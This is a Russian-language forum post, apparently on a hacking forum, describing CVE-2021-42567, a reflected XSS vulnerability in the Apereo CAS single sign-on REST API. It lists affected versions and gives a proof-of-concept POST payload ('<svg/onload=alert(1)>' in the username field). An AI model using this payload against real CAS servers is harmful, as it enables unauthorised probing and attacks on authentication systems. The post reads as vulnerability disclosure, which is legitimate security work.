• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья CVE-2021-42567 Apereo CAS система единого входа в систему REST API-интерфейс XSS-уязвимость

0x0021h

RAID-массив
Пользователь
Регистрация
14.11.2021
Сообщения
53
Решения
1
Реакции
78
Предпосылки:

Серия Apereo CAS v6.3.x соответствует предыдущей версии v6.3.7.1, а серия v6.4.x соответствует версии v6.4.2;
Apereo CAS запускает интерфейс Restful API (по умолчанию не включен)


Уровень опасности:

CVSS: 4.3

Затронутая версия:

Серия Apereo CAS v6.3.x до v6.3.7.1
версия v6.4.2

PoC:
Код:
http://127.0.0.1/cas/v1/tickets/

Полезные данные, отправленные POST:
Код:
username=<svg/onload=alert(1)>&password=admin

Путем проверки обнаруживается наличие отражающей уязвимости XSS.
1641263987207.png
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх